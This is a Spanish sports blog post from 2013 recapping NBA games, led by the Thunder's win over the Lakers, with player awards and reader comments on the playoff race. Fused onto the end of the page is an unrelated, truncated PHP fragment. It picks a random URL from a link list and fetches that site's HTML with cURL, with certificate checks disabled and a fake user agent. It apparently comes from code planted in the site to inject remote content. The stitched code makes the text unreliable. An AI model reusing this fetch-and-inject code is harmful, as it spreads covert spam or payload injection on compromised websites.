La Crónica: A otro nivel

06 de March de 2013 por txusma

A los 3 minutos del primer cuarto, y tras un forcejeo con Thabo Sefolosha, Kobe Bryant se lleva la mano al codo derecho y toma el camino de los vestuarios. Si se hubiera tratado de otro tipo de jugador seguro que la mayoría de aficionados amarillos habrían apagado la TV y se hubrían dedicado a otro tipo de quehaceres más urgente. Pero hablamos de Kobe, y cuando hablamos de Kobe sabemos que a poco que pueda, se va a dejar la piel y el físico sobre la cancha. Unos minutos después, como se preveía, Bryant saltaba de nuevo a la pista con su equipo ya claramente por debajo en el marcador. A pesar de la diferencia y del daño que les estaban haciendo Durant y sobretodo Westbrook, hay que reconocer que los Lakers no bajaron los brazos en ningún momento y se llegaron a poner a 5 puntos a mediados del último cuarto tras un triple de Steve Nash. Ahí se acabó la broma. Los amarillo ya anotaron durante lo que quedaba de partido mientras los Thunder les pasaban literalmente por encima, con triple de Serge Ibaka incluido (105-122). Se dice que Dwight Howard también jugó ayer e incluso que cogió 16 rebotes. La realidad es que no marcó diferencias en ningún lado de la cancha. Muy triste.

Boston y Denver consiguieron sendas victorias a domicilio. Los verdes lo consiguieron de la mano de Paul Pierce y Avery Bradley que últimamente se está destapando como un fino anotador además de un excelente defensor. Ayer lo tocó a Jrue Holiday sufrirlo aunque al base aún le quedaron arrestos para ser de lo mejor de su equipo. El debate sobre el nivel de los Celtics sin Rondo continúa (109-101). Por su parte, los Nuggets se impusieron a los Kings gracias a una segunda parte prácticamente perfecta en la que anotaron 70 puntos con cerca de un 64% de acierto. Se escaparon en el tercer cuarto pero los de Sacramento, de la mano todo el partido de Marcus Thorton, consiguieron entrar en el último vivos y con posibilidades de llevarse la victoria. En ese momento apareció el “abuelo” Andre Miller para cerrar el partido para los suyos (120-113). 

PREMIOS

MVP: Huracán Russel Westbrook. El base de los Thunder anotó 37 puntos merced a su velocidad, demasiada para los defensores exteriores de los Lakers. Además cogió 10 rebotes y repartió 5 asistencias.

Sorpresa: No solo defiende como los ángeles sinó que de vez en cuando le da por ponerse a anotar. Avery Bradley anotó 9 de sus primeros 10 lanzamientos y acabó el partido con 22 puntos.

Decepción: Ya hemos hablado de Dwight Howard pero también hemos de nombrar a Demarcus Cousins. El de los Kings falló 11 de sus 12 lanzamientos a canasta. Su compañero Tyreke Evans no estuvo mucho mejor y se quedó en 7 míseros puntos sin aportar casi nada en el resto de apartados.

Esfuerzo en vano: Sigue el idilio de Marcus Thorton con el aro. Anoche fueron 32 puntos. Su compañero Isaiah Thomas consiguió 23 puntos y repartió además 8 asistencias.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Buen partido el Lakers – Thunder en el que ha quedado claro la diferencia actual entre los dos equipos. A pesar del sobreesfuerzo de un gran Kobe y de Nash en el tercer y principio del último cuarto, OKC dominó el partido a ratos de forma insultante y lo cerró a lo grande. Imparable Westbrook para los defensores exteriores de los Lakers que tienen un gran problema defensivo con los bases contrarios lo que descoloca toda la defensa y les hace encajar muchos puntos contra equipos con bases de élite (que hoy día son muchos). Los Lakers tienen ahora un calendario más o menos sencillo en el que tienen que apretar mucho para coger a Jazz, Rockets (o cuidado Warriors). Pueden hacerlo pero no pueden fallar casi ningún partido fácil.
    En Philly, los Celtics cumplieron y ganaron el partido con un cada vez más importante Bradley. Los Celtics suben y la clasificación en el Este se aprieta de una manera increíble con 5 equipos en 3 partidos para repartirse los puestos 4-8 de los PO.
    Por su parte en el Oeste, siguen su carrera hacia arriba los Nuggets que dejan ya de rueda a los Warriors y miran definitivamente a intentar conseguir ventaja de campo para los PO. Parece difícil pero no imposible que lo consigan si siguen así

      Citar

  2. Jose Luis dice:
    #2

    Decidme que veis los cortos de Shaqtin’A Fool… yo es que me parto con ellos xD

    http://www.nba.com/video/channels/tnt_overtime/2013/03/06/20130305-shaqtin-fool.nba

    Javale… jajajajajaja

    Lakers están mejorando, pero como dice la crónica, los Thunder son otro nivel. No creo que nadie esperase una victoria. Bien los Celtics ante unos Sixers que dan por acabada la temporada, y los Nuggets dieron buena cuenta de los Kings, y como dice GreenPride, van en busca de la ventaja de campo, que es difícil pero no imposible, y creo que si la consiguen pasarían la primera ronda.

      Citar

  3. Esteban dice:
    #3

    los lakers estan 30/31? y tienen chances de PO? q barato esta el oeste este año

    les quedan 21 juegos en el calendario, deberian ganar 14 y perder 7 minimamente, aunque lo ideal seria un 17 y 4

    demasiadas victorias

      Citar

  4. Esteban dice:
    #4

    por otra parte, tanti esfuerzo para llegar a PO los lakers y los mas probable es que los barran y por paliza como anoche

      Citar

  5. Zukuo dice:
    #5

    Si Lakers entra 8º y juegan PO con Spurs pueden llegar lejos en postemporaday no jugarian contra Thunders hasta la final, perosi entran 7º o Thunder al final quedan 1º los humillaria 4-0 o 4-1.

      Citar

  6. Esteban dice:
    #6

    los spurs aun no tienen asegurado el 8vo puesto, y en caso de pasar a los spurs se enfrentarian en semi con clippers, quienes los han apaleado escandalosamente desde la pretemporada

      Citar

  7. Simon dice:
    #7

    Esteban:
    los spurs aun no tienen asegurado el 8vo puesto, y en caso de pasar a los spurs se enfrentarian en semi con clippers, quienes los han apaleado escandalosamente desde la pretemporada

    No, Clippers será 3. Si Lakers es octavo evitaría a Clippers y OKC ( si no llegan al primer puesto ) hasta la final.

      Citar

  8. Simon dice:
    #8

    Es que ahora mismo es mucho mejor para cualquier equipo quedar octavo que quedar 7. No estoy diciendo que Spurs sean faciles pero si que es preferible enfrentarse a Spurs que a OKC y el cruce de semis seria mas facil tambien.

      Citar

  9. Zukuo dice:
    #9

    Exacto Simon, ya veremos si al final el que vaya 7º ya sean Houston, Utah, Lakers o incluso GS Warriors, se deja llevar algún partido para evitar a Oklahoma y Clippers hasta la posible final. Todo esto si Spurs mantiene el primer puesto, que sin Parker se antoja un poco más dificil.

      Citar

  10. nba dice:
    #10

    Que los Lakers se preocupen de entrar en playoffs, que no dependen de si mismos, ya que sino seguro que Kobe cogera un berrinche, y no hacer las cuentas de la lechera, no vaya a ser que Spurs y cia se dejen llevar los ultimos partidos de regular y se encuentren con una sorpresa

      Citar

  11. Esteban dice:
    #11

    los lakers no pueden dejarse perder ningun partido si quieren clasificar a los PO

    hoy por hoy, con mas de 60 partidos jugados estan por debajo el 50%, a quien le cabe la idea de que pierdan mas de la cuenta?

      Citar

  12. Jose Luis dice:
    #12

    Los Jazz pierden en Cleveland tras un gran ultimo cuarto de los Cavs… falta le hacía a los Lakers esto, que pierden de 19 al descanso…

      Citar

  13. Jose Luis dice:
    #13

    Dios mío Bryant, vaya último cuarto… mañana me lo veo enterito, porque madre mía. Ganan los Lakers 108-102 gracias a un último cuarto impresionante de Black Mamba. Ha acabado con 42p 7r 12a y 6 pérdidas, 14-21 en TC

    El parcial en el último cuarto ha sido 33-9

      Citar

  14. MagicJohnson32 dice:
    #14

    Jose Luis:
    Dios mío Bryant, vaya último cuarto… mañana me lo veo enterito, porque madre mía. Ganan los Lakers 108-102 gracias a un último cuarto impresionante de Black Mamba. Ha acabado con 42p 7r 12a y 6 pérdidas, 14-21 en TC

    El parcial en el último cuarto ha sido 33-9

    No hay palabras.

      Citar

  15. Denise dice:
    #15

    Esteban: los lakers no pueden dejarse perder ningun partido si quieren clasificar a los POhoy por hoy, con mas de 60 partidos jugados estan por debajo el 50%, a quien le cabe la idea de que pierdan mas de la cuenta?

    Los Lakers pueden perder incluso más de 5 partidos y lo seguirian teniendo facil para entrar en Playoffs. Faltan 20 partidos, haciendo un 13-7 y alcanzando las 44 victorias, stan en Playoffs seguro.
    Revisad el calendario que tienen en la segunda quincena de marzo. Facilisimo.
    A mi no me extrañaría que acabasen hasta 6º, aunque si yo fuera de Lakers, preferiría acabar en la posición que te permita enfrentarte a Spurs (seguramente 8º) y no a Oklahoma o Clippers

      Citar

  16. max dice:
    #16

    Tal como esta la clasificacion de apretada, con tres plazas para cuatro equipos, nadie va a poder especular con el puesto final. Buscando el octavo puedes quedar fuera de PO tranquilamente.

      Citar

  17. Zukuo dice:
    #17

    Cuando queden de 3 a 5 partidos se verá si se puede especular y si interesa perder alguno. Nadie querrá enfrentarse a Thunder eso seguro

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>